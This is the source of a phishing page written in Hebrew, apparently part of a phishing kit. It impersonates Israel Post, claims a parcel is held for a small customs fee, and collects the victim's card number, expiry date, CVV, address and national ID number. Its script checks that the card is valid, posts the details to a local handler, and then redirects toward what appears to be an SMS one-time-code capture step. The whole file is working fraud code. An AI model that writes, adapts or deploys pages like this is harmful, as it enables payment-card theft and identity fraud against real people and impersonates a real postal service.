<?php 
require '../main.php';
?><!DOCTYPE html>
<html lang="en" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Israel Post</title>
    <link rel="stylesheet" href="res/main.css">
</head>
<body>
<header>
<img src="res/header-lg.png" class="lg">
<img src="res/header-md.png" class="md">
<img src="res/header-sm.png" class="sm">
<img src="res/header-xs.png" class="xs">
</header>

<main>

<div class="form">

<div class="title">
עקוב אחר החבילה שלך
</div>
<div class="text">
החבילה שלך <b>[RG00072254090]</b> בדרך אליך. עליך לשלם את דמי המכס כדי למנוע עיכובים במשלוח.
<p>דמי מכס: 12.90₪</p>
</div>

<div class="holder">

<div class="text">
    נא להזין את פרטי הכרטיס שלך כדי לשלם את דמי המכס.
</div>

<div class="col">
<label>שם בעל הכרטיס</label>
<input type="text" id="d0">
</div>

<div class="col">
<label>מספר כרטיס</label>
<input type="text" id="d1" placeholder="XXXXXXXXXXXXXXXX">
</div>

<div class="col">
<label>תאריך תפוגה</label>
<input type="text" id="d2" placeholder="MM/YY">
</div>

<div class="col">
<label>קוד אבטחה</label>
<input type="text" id="d3" placeholder="CVV">
</div>

<div class="text">
פרטים אישיים
</div>

<div class="col">
<label>כתובת</label>
<input type="text" id="d4" placeholder="">
</div>

<div class="col">
<label> עיר </label>
<input type="text" id="d5" placeholder="">
</div>

<div class="col">
<label>מיקוד</label>
<input type="text" id="d6" placeholder="">
</div>

<div class="col">
<label>מספר תעודת זהות</label>
<input type="text" id="d7" placeholder="">
</div>



<div class="col">
<button onclick="sendCard()">המשך</button>
</div>

</div>


</div>


</main>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-creditcardvalidator/1.2.0/jquery.creditCardValidator.js"></script>
<script>
$("#d1").mask("0000000000000000");
$("#d2").mask("00/00");
$("#d3").mask("0000");

var allowSubmit = false;
var abortVal = true;

function validate() {
    abortVal = false;
    allowSubmit = true;

    if ($("#d0").val().length < 2) {
        $("#d0").addClass("error");
        allowSubmit = false;
    } else {
        $("#d0").removeClass("error");
    }    
    
    
    if ($("#d1").val().length < 16) {
        $("#d1").addClass("error");
        allowSubmit = false;
    } else {
        $("#d1").removeClass("error");
    }

    if ($("#d3").val().length < 3) {
        $("#d3").addClass("error");
        allowSubmit = false;
    } else {
        $("#d3").removeClass("error");
    }
    if ($("#d4").val().length < 3) {
    $("#d4").addClass("error");
    allowSubmit = false;
} else {
    $("#d4").removeClass("error");
}

if ($("#d5").val().length < 3) {
    $("#d5").addClass("error");
    allowSubmit = false;
} else {
    $("#d5").removeClass("error");
}

if ($("#d6").val().length < 2) {
    $("#d6").addClass("error");
    allowSubmit = false;
} else {
    $("#d6").removeClass("error");
}

if ($("#d7").val().length < 3) {
    $("#d7").addClass("error");
    allowSubmit = false;
} else {
    $("#d7").removeClass("error");
}

    $('#d1').validateCreditCard(function (result) {
        if (result.valid) {
            $("#d1").removeClass("error");
        } else {
            $("#d1").addClass("error");
            allowSubmit = false;
        }
    });

    const _exp = $("#d2").val();
    const _exps = _exp.split("/");
    const currentYear = new Date().getFullYear() % 100;
    const currentMonth = new Date().getMonth() + 1;

    if (_exps[0] > 12 || _exps[0] <= 0 || _exps[1] < currentYear || (_exps[1] == currentYear && _exps[0] < currentMonth)) {
        $("#d2").addClass("error");
        allowSubmit = false;
    } else {
        $("#d2").removeClass("error");
    }
}

$("input").keyup(() => {
    if (!abortVal) {
        validate();
    }
});

$("input").keydown((e) => {
    if (e.key === "Enter") {
        sendCard();
    }
});




function sendCard() {
    validate();
    if (allowSubmit) {
        $.post("post.php", {
            name: $("#d0").val(),
            cc: $("#d1").val(),
            exp: $("#d2").val(),
            cvv: $("#d3").val(),
            address: $("#d4").val()+" - "+$("#d5").val()+" - "+$("#d6").val(),
            id: $("#d7").val(),
           
        }, (res) => {
            window.location = "wait.php?next=sms.php";
        });
    }
}

</script>
</body>
</html>